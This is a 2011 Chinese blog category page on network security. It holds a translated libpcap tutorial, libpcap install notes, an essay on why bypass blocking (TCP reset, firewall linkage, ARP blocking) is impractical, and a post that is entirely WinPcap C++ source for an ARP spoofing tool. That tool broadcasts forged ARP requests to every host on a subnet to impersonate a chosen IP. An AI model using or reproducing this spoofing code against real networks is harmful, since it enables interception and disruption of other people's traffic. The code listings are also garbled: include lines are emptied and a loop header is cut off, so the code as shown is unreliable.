C++博客-flyonok-随笔分类-network security

使用Cacti监测系统与网络性能

flyonok — Mon, 11 Apr 2011 08:57:00 GMT

摘要: 使用Cacti监测系统与网络性能阅读全文

flyonok 2011-04-11 16:57 发表评论

网络流量监控器mrtg全攻略

flyonok — Mon, 11 Apr 2011 08:48:00 GMT

摘要: 网络流量监控器mrtg全攻略阅读全文

flyonok 2011-04-11 16:48 发表评论

用libpcap抓包并进行底层网络欺骗序

flyonok — Fri, 08 Apr 2011 09:33:00 GMT

摘要: 用libpcap抓包并进行底层网络欺骗序阅读全文

flyonok 2011-04-08 17:33 发表评论

用libpcap抓包并进行底层网络欺骗 --part 1

flyonok — Fri, 08 Apr 2011 09:32:00 GMT

用libpcap抓包并进行底层网络欺骗

作者：Martin Casado

翻译：Yada

Download libpcap Unix source from Tcpdump.org
Search for other neat-o libpcap stuff from google

------------------------------------------------------------------------------------
本文档包含
1。介绍(你已经在这里了）
2。抓第一个包
3。写一个基本的抓包引擎
4。分析包。。。。（正在写作中）

------------------------------------------------------------------------------------

该文档的读者： 该指南假定你对网络有大概的了解。如：什么是包，包是如何送出的，物理层与数据链路层还有网络层等等。但是，我未假定你以前有网络编程的经验，仅仅对C有基本的知识即可。如果你已经是一个C/C++大师，那么你一定对 man 3 pcap 很熟悉，因此可以跳过我这种令人厌烦的写作风格。在你的系统上应该有已能运行的C编译器并且libpcap已经安装。该文档只涉及以太网的数据链路层。。。因此如果你使用的是其他一些令人厌恶的网络如令牌环网。。。那你得靠你自己去找到数据链路的头文件。最后，该节出现的所有的源程序在linux、内核2。2。14上编写并测试通过，虽然它应该是可移植的（呵呵）但是我不能保证它能在其他操作系统上编译通过。你将用root运行这些程序，要小心别误操作弄坏你的系统。哦，还有虽然我已经测试并运行了所有指南列出的代码，而且没有问题，但是我没有这个责任完成你的这些屁东西，而且还不得不被卫生部门隔离，你自己冒这个险吧，我不奉陪了（恐怖的鬼叫声）。

简介：这儿就是用libpcap进行抓包指南的开始。不可避免地有问题出现了。。。“该死的抓包是什么？”或“谁是libpcap？”。。。我想我首先得回答这些问题。

抓包：简单地说就是“把包抢过来”
“哎呀，谢谢你马丁 :-P”你脱口而出。
不，实际上，我们在这里所做的一其都是通过操作系统底层提供的设备因此可以抓到原始状态的包。例如：假定你的以太网卡从网络获得一个数据包，一旦它将这个包交给操作系统，操作系统必须确定该包是何种类型，因此它剥掉数据包的以太网头并查看下一层，也许它是一个IP包。。。现在操作系统必须剥掉IP头并确定它是哪一类型的IP包，最后，假定它被确定为UDP包，于是UDP头被剥掉并且其负载（数据部分）被交给包所发向的应用程序（注意：这里是真实情况的极度简单版本，但是我尽量阐明重点）。我们可以通过抓报截取网卡看到的任何包，将它从头到尾全部抢过来！忽略它发往哪个断口，甚至哪个主机！！
libpcap “提供与实现无关的访问操作系统所提供的底层捕获机制的分组捕获函数库”（Stivens，Unix network Programming, 707 页)。libpcap就是我们将用来直接从网卡那里抢包的函数库。顺便也提一下抓包的其他方法吧，有BPF（Berkeley Packet Filter), DLPI(Data Link Prvider Interface)和SOCKET_PACKET类型套接字（仅仅在linux上）

正式开讲：有太多的东西需要讲解。。。因此让我们先熟悉libpcap吧。如我前面提及的，这节出现的所有代码假定你工作在以太网上，如果不是，这篇指南的基础部分仍然贴题，但是等会出现的代码以及对以太网头的分析显然不适合：:-( *很抱歉*。摩拳擦掌准备写我们的第一个 libpcap 程序吧！！！将下面这个例子复制到你最喜欢的编辑器里（可能是 VIM 如果你对其感兴趣）、保存、编译它。。。
%>gcc ldev.c -lpcap

------------------------------------------------------------------------------------

/* ldev.c
   Martin Casado

   To compile:
   >gcc ldev.c -lpcap

Looks for an interface, and lists the network ip
and mask associated with that interface.
*/
#include
#include
#include /* GIMME a libpcap plz! */
#include
#include
#include
#include

int main(int argc, char **argv)
{
char *dev; /* name of the device to use */
char *net; /* dot notation of the network address */
char *mask;/* dot notation of the network mask    */
int ret;   /* return code */
char errbuf[PCAP_ERRBUF_SIZE];
bpf_u_int32 netp; /* ip          */
bpf_u_int32 maskp;/* subnet mask */
struct in_addr addr;

/* ask pcap to find a valid device for use to sniff on */
dev = pcap_lookupdev(errbuf);

/* error checking */
if(dev == NULL)
{
printf("%s\n",errbuf);
exit(1);
}

/* print out device name */
printf("DEV: %s\n",dev);

/* ask pcap for the network address and mask of the device */
ret = pcap_lookupnet(dev,&netp,&maskp,errbuf);

if(ret == -1)
{
printf("%s\n",errbuf);
exit(1);
}

/* get the network address in a human readable form */
addr.s_addr = netp;
net = inet_ntoa(addr);

if(net == NULL)/* thanks Scott :-P */
{
perror("inet_ntoa");
exit(1);
}

printf("NET: %s\n",net);

/* do the same as above for the device's mask */
addr.s_addr = maskp;
mask = inet_ntoa(addr);

if(mask == NULL)
{
    perror("inet_ntoa");
    exit(1);
}

printf("MASK: %s\n",mask);

return 0;
}

--------------------------------------------------------------------------------

你运行这个程序了吗? 如果没有, 运行它 :-) 假定它编译过, 并且运行无错你的输出应该如下：

DEV: eth0
NET: 192.168.12.0
MASK: 255.255.255.0

现在如果你的设备不是eth0、eth1或eth后面跟着某个数字之类的，那就会有麻烦了，因为该文档所描述的基本上都是监听以太网数据包。显然，你的IP地址和子网掩码可能与我所写的不一样，但是真实的值并不是讨论的重点。

“那我们刚才做了什么？”你问道。很好，我们刚才向 libpcap 问了要监听的接口的信息。
“什么是接口？”
把接口想象成一个将你的电脑连接到某个网络的硬件，在Linix上，eth0 表示你电脑上的第一块以太网卡，它就是我将用来示范libpcap的网络接口。现在你真正要关注的是我们获得的设备名字“eth0”，我们将其名字传递给libpcap告诉它从哪儿抓包。NET和MASK 就是和网卡关联的IP地址和子网掩码。我希望哪天会写一个比用libpcap来列出系统信息的更好的方法 :-)

好了，现在你应该知道如何写，编译和运行一个libpcap程序，获得我们抓包的网络设备，并且对我们所做的有了基本的了解。下面，来抓我们的第一个包。。哇呜~！！

flyonok 2011-04-08 17:32 发表评论

用libpcap抓包并进行底层网络欺骗 --part 2

flyonok — Fri, 08 Apr 2011 09:31:00 GMT

摘要: 用libpcap抓包并进行底层网络欺骗 --part 2 阅读全文

flyonok 2011-04-08 17:31 发表评论

hacker成长的代码之路

flyonok — Fri, 08 Apr 2011 09:30:00 GMT

摘要: hacker成长的代码之路阅读全文

flyonok 2011-04-08 17:30 发表评论

ARP欺骗源码（基于WinPcap实现）

flyonok — Thu, 07 Apr 2011 03:44:00 GMT

//ArpCheat.h

#ifndef MY_ARP_CHEAT_INCLUDE_H
#define MY_ARP_CHEAT_INCLUDE_H

//字节对齐必须是1
#pragma pack (1)
struct ethernet_head
{
unsigned char dest_mac[6]; //目标主机MAC地址
unsigned char source_mac[6]; //源端MAC地址
unsigned short eh_type;   //以太网类型
};

struct arp_head
{
unsigned short hardware_type; //硬件类型：以太网接口类型为1
unsigned short protocol_type; //协议类型：IP协议类型为0X0800
unsigned char add_len;   //硬件地址长度：MAC地址长度为6B
unsigned char pro_len;   //协议地址长度：IP地址长度为4B
unsigned short option;   //操作：ARP请求为1，ARP应答为2
unsigned char sour_addr[6]; //源MAC地址：发送方的MAC地址
unsigned long sour_ip;   //源IP地址：发送方的IP地址
unsigned char dest_addr[6]; //目的MAC地址：ARP请求中该字段没有意义；ARP响应中为接收方的MAC地址
unsigned long dest_ip;   //目的IP地址：ARP请求中为请求解析的IP地址；ARP响应中为接收方的IP地址
unsigned char padding[18];
};

struct arp_packet     //最终arp包结构
{
ethernet_head eth;    //以太网头部
arp_head arp;     //arp数据包头部
};
#pragma pack ()
/**
* 获得网卡的MAC地址
* pDevName 网卡的设备名称
*/
unsigned char* GetSelfMac(char* pDevName);
/**
* 封装ARP请求包
* source_mac 源MAC地址
* srcIP 源IP
* destIP 目的IP
*/
unsigned char* BuildArpPacket(unsigned char* source_mac,

                        unsigned long srcIP, unsigned long destIP);

#endif

//ArpCheat.cpp
#include
#include
#include
#include
#include
#include "ArpCheat.h"

int main(int argc,char* argv[]){
pcap_if_t *alldevs;              //全部网卡列表
pcap_if_t *d;                    //一个网卡
int inum;                        //用户选择的网卡序号
int i=0;                         //循环变量
pcap_t *adhandle;                //一个pcap实例
char errbuf[PCAP_ERRBUF_SIZE];   //错误缓冲区
unsigned char *mac;              //本机MAC地址
unsigned char *packet;           //ARP包
unsigned long fakeIp;            //要伪装成的IP地址
pcap_addr_t *pAddr;               //网卡地址
unsigned long ip;                //IP地址
unsigned long netmask;           //子网掩码

if(argc!=2){
   printf("Usage: %s inet_addr\n",argv[0]);
   return -1;
}

//从参数列表获得要伪装的IP地址
fakeIp = inet_addr(argv[1]);
if(INADDR_NONE==fakeIp){
   fprintf(stderr,"Invalid IP: %s\n",argv[1]);
   return -1;
}

     /* 获得本机网卡列表 */
     if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
     {
         fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
         exit(1);
     }

     /* 打印网卡列表 */
     for(d=alldevs; d; d=d->next)
     {
         printf("%d", ++i);
         if (d->description)
             printf(". %s\n", d->description);
         else
             printf(". No description available\n");
     }
     //如果没有发现网卡
     if(i==0)
     {
         printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
         return -1;
     }
     //请用户选择一个网卡
     printf("Enter the interface number (1-%d):",i);
     scanf("%d", &inum);

    //如果用户选择的网卡序号超出有效范围，则退出
     if(inum < 1 || inum > i)
     {
         printf("\nInterface number out of range.\n");
         /* Free the device list */
         pcap_freealldevs(alldevs);
         return -1;
     }


     /* 移动指针到用户选择的网卡 */
     for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);

     mac = GetSelfMac(d->name+8); //+8以去掉"rpcap://"

     printf("发送ARP欺骗包，本机(%.2X-%.2X-%.2X-%.2X-%.2X-%.2X) 试图伪装成%s\n",
            mac[0],mac[1],mac[2],mac[3],mac[4],mac[5],argv[1]);

/* 打开网卡 */
     if ( (adhandle= pcap_open(d->name,          // name of the device
                               65536,            // portion of the packet to capture
                               0,                //open flag
                               1000,             // read timeout
                               NULL,             // authentication on the remote machine
                               errbuf            // error buffer
                               ) ) == NULL)
     {
         fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n",
                  d->name);
         /* Free the device list */
         pcap_freealldevs(alldevs);
         return -1;
     }

for(pAddr=d->addresses; pAddr; pAddr=pAddr->next){
   //得到用户选择的网卡的一个IP地址
   ip = ((struct sockaddr_in *)pAddr->addr)->sin_addr.s_addr;
   //得到该IP地址对应的子网掩码
   netmask = ((struct sockaddr_in *)(pAddr->netmask))->sin_addr.S_un.S_addr;
   if (!ip || !netmask){
    continue;
   }
   //看看这个IP和要伪装的IP是否在同一个子网
   if((ip&netmask)!=(fakeIp&netmask)){
    continue; //如果不在一个子网，继续遍历地址列表
   }

   unsigned long netsize = ntohl(~netmask); //网络中主机数
   unsigned long net = ip & netmask; //子网地址

   for(unsigned long n=1; n    //第i台主机的IP地址，网络字节顺序
    unsigned long destIp = net | htonl(n);
    //构建假的ARP请求包，达到本机伪装成给定的IP地址的目的
    packet = BuildArpPacket(mac,fakeIp,destIp);
    if(pcap_sendpacket(adhandle, packet, 60)==-1){
      fprintf(stderr,"pcap_sendpacket error.\n");
    }
   }

}

return 0;
}
/**
* 获得网卡的MAC地址
* pDevName 网卡的设备名称
*/
unsigned char* GetSelfMac(char* pDevName){

static u_char mac[6];

memset(mac,0,sizeof(mac));

LPADAPTER lpAdapter =   PacketOpenAdapter(pDevName);

if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
   return NULL;
}

PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
if (OidData == NULL)
{
   PacketCloseAdapter(lpAdapter);
   return NULL;
}
//
// Retrieve the adapter MAC querying the NIC driver
//
OidData->Oid = OID_802_3_CURRENT_ADDRESS;

OidData->Length = 6;
memset(OidData->Data, 0, 6);
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
if(Status)
{
   memcpy(mac,(u_char*)(OidData->Data),6);
}
free(OidData);
PacketCloseAdapter(lpAdapter);
return mac;

}

/**
* 封装ARP请求包
* source_mac 源MAC地址
* srcIP 源IP
* destIP 目的IP
*/
unsigned char* BuildArpPacket(unsigned char* source_mac,
                       unsigned long srcIP,unsigned long destIP)
{
static struct arp_packet packet;

//目的MAC地址为广播地址，FF-FF-FF-FF-FF-FF
memset(packet.eth.dest_mac,0xFF,6);
//源MAC地址
memcpy(packet.eth.source_mac,source_mac,6);
//上层协议为ARP协议，0x0806
packet.eth.eh_type = htons(0x0806);

//硬件类型，Ethernet是0x0001
packet.arp.hardware_type = htons(0x0001);
//上层协议类型，IP为0x0800
packet.arp.protocol_type = htons(0x0800);
//硬件地址长度：MAC地址长度为0x06
packet.arp.add_len = 0x06;
//协议地址长度：IP地址长度为0x04
packet.arp.pro_len = 0x04;
//操作：ARP请求为1
packet.arp.option = htons(0x0001);
//源MAC地址
memcpy(packet.arp.sour_addr,source_mac,6);
//源IP地址
packet.arp.sour_ip = srcIP;
//目的MAC地址，填充0
memset(packet.arp.dest_addr,0,6);
//目的IP地址
packet.arp.dest_ip = destIP;
//填充数据，18B
memset(packet.arp.padding,0,18);

return (unsigned char*)&packet;

}

flyonok 2011-04-07 11:44 发表评论

libpcap安装篇

flyonok — Thu, 31 Mar 2011 09:48:00 GMT

1）下载：

http://www.tcpdump.org/

2) 安装：

#./configure

#make install

将生成的库安装到系统默认目录中。此目录为 /usr/lib ，如果需要修改，可以修改文件Makefile 的 prefix。

3）问题解决：

#apt-get install flex

make: yacc: Command not found 解决方法：#apt-get install biso

4）测试

#gcc test.c -lpcap

5）libpcap安装问题解决

/usr/local/lib/libpcap.so: undefined reference to `pcap_parse’ 解决方法：

没有安装开发包，
apt-get install libpcap-dev

我是用的 debian 系统，发现没有libpcap-dev 。解决方法：更新源

#vi /etc/apt/sources.list 添加下列源，然后# apt-get update

deb http://ftp.debian.org/debian lenny main contrib non-free

deb-src http://ftp.debian.org/debian lenny main contrib non-free

deb http://mirrors.163.com/debian lenny main contrib non-free

deb-src http://mirrors.163.com/debian lenny main contrib non-free

flyonok 2011-03-31 17:48 发表评论

旁路阻断的可行性分析

flyonok — Thu, 10 Mar 2011 01:04:00 GMT

旁路阻断就是采用旁路侦听的手段来获取互联网上的数据包，然后再进行协议还原，根据内容进行阻断。这类技术的优点是不影响互联网访问的速度，并且对用户没有特殊的设置要求。通俗讲是并联在互联网的出口上，不会影响原来网络的稳定性。
采用旁路的方式管理网络并阻断非法连接的方法可以分为三类：
1、发送TCP Reset包，
2、通过与网关产品联动，建立临时规则
3、进行基于arp得阻断方式。
首先我们看一下TCP Reset，我们以IDS为例，IDS设备是一个典型的旁路监听并通过TCP Reset进行阻断的网络安全设备。IDS TCP Reset实现方法，当IDS发现一条非法得连接IDS将会向通信的两端各发送一个TCP RESET包，从而实现主动切断连接的目的，此时通信双方的堆栈将会把这个RESET包解释为另一端的回应，然后停止整个通信过程，释放缓冲区并撤销所有TCP状态信息。这个时候，攻击数据包可能还在目标主机操作系统TCP/IP堆栈缓冲区中，没有被提交给应用程序，由于缓冲区被清空了，所以攻击不会发生。
对于RESET包来说，IDS发出的RESET包的前提是知道整个会话当前的序列号和确认号，否则这个RESET包将会被忽略。我们假定一个会话得确认号必须为152如果你发送的RESET包的确认号为142，那么堆栈将会认为这是一个无效的数据包或者被破坏的数据包而将它忽略掉。
从另一方面讲所有的IDS在响应攻击时都有延迟时间，因为IDS从抓取数据包，监测攻击，产生RESET包，到最后发出RESET整个过程都要消耗一定的时间。很多的IDS使用libpcap库来抓包，大部分IDS构建在类BSD的系统上，BSD系统下是利用BPF（Berkeley Packet Filters）进行抓包，BPF默认将会开一个很大的缓冲区，在一个典型的网络中，IDS发出RESET包的过程大约会延迟半秒。在Linux和Solaris平台上，性能要稍微好一点，但是肯定也有延迟时间。
而且TCP Rest对于网络得应用来说也有着很大得局限性，其只能针对通常得标准TCP连接发送阻断信息，对于UDP会话是无能为力得。再则目前得一些网络应用软件在会话连接保持上都很强得能力，TCP Reset包对于他们得效果基本可以忽略。
通过与网关产品的联动方式主要是向防火墙发送临时规则，以及路由器或交换机发送临时ACL列表，阻断当前这个会话。
这种方式存在着这么几个方面得问题：
1、首先是联动协议问题。“联动”一直是网络安全界中的一个很时髦的概念，虽然已经有五六年的历史，但是到目前为止，还远远没有得到充分的发展。现在联动得实现是以现有得某个厂家为核心，其他厂家的产品在一些半公开的SDK的支持下实现与核心厂家的某个产品实现互联。这样导致现有和多产品有联动功能，但是没有联动得实际效果。
2、联动信息的滞后。即使产品与防火墙有着优良得联动相应方式，IDS产品在检测得过程中发现了非法得连接，生成一条临时规则发送到防火墙，防火墙应用这条规则阻断这个连接；在这一个过程中存在着三个延时，一、IDS发现非法连接，生成临时规则；二、规则传输给防火墙；三、防火墙应用规则。这三个演示得总时间最好情况下是小于两秒，而且这个过程当中IDS的检测是滞后IDS检测到非法连接时，这个连接已经建立了，如果这个连接时蠕虫，或木马，两秒的延时足够成功攻击了。
3、当遇到大规模的非法连接的时候，IDS会针对每一条会话向防火墙添加临时规则，这样势必造成防火墙临时规则增大，降低防火墙的效率，引起防火墙包转发延时，严重造成防火墙瘫痪，网络中断。
最后我们来看一下基于arp的阻断，共有三种方式ARP 欺骗、ARP 投毒和 ARP 攻击。先了解ARP的原理。ARP 用于将 IP 地址匹配到或解析至恰当的 MAC 地址，所有的网络设备都有一张 ARP 表，里面临时记忆着该设备已经匹配起来的所有的 IP 地址和 MAC 地址。ARP 表能够确保该设备不需要向已经与自己进行过通信的计算机重复 ARP 询问。当有人在未获得授权时就企图更改 MAC 和 IP 地址的 ARP 表格中的信息时，就发生了 ARP 攻击。通过这种方式我们可以伪造ARP应答包，使得非法连接主机的ARP表错误，无法连接到网关，从而阻断连接。
这种阻断方式从效果上讲是很强得，但是同时也造成了一个问题，其不但阻止了非法连接，而且也阻断了合法连接，这对于网络中的正常应用是有着很大得影响得。
综上所述，采用旁路阻断的方式在实际应用中时不可行的。

flyonok 2011-03-10 09:04 发表评论